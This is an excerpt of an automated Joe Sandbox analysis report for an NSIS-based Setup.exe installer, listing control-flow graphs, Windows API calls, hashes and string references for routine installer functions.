                                                                                                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00427D76,00403792,00000000), ref: 004034FF
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                              • String ID: (]C$... %d%%$pAB$v}B$y=B
                                                                                                                                                                              • API String ID: 651206458-2063389020
                                                                                                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                              Strings
                                                                                                                                                                              • soft, xrefs: 004036A1
                                                                                                                                                                              • Error launching installer, xrefs: 00403603
                                                                                                                                                                              • Null, xrefs: 004036AA
                                                                                                                                                                              • Inst, xrefs: 00403698
                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                              • lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427D76,759223A0,00000000), ref: 00406902
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2740478559-0
                                                                                                                                                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • GlobalFree.KERNELBASE(008E8328), ref: 00402387
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeGloballstrcpyn
                                                                                                                                                                              • String ID: Exch: stack < %d elements$HandbookFirmware$Pop: stack empty
                                                                                                                                                                              • API String ID: 1459762280-2534795225
                                                                                                                                                                              • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                                              • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                              • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                              • GlobalFree.KERNELBASE(008E8328), ref: 00402387
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3376005127-0
                                                                                                                                                                              • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                              • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                              • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                                                                                                                                              • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                                                                                                                                              APIs
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2568930968-0
                                                                                                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                              • String ID: <RM>$HandbookFirmware$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                              • API String ID: 247603264-1642411435
                                                                                                                                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427D76,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427D76,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                              Strings
                                                                                                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.2093717061.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.2093686064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093750393.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2093781409.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.2094366668.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                              • API String ID: 3156913733-2180253247
                                                                                                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
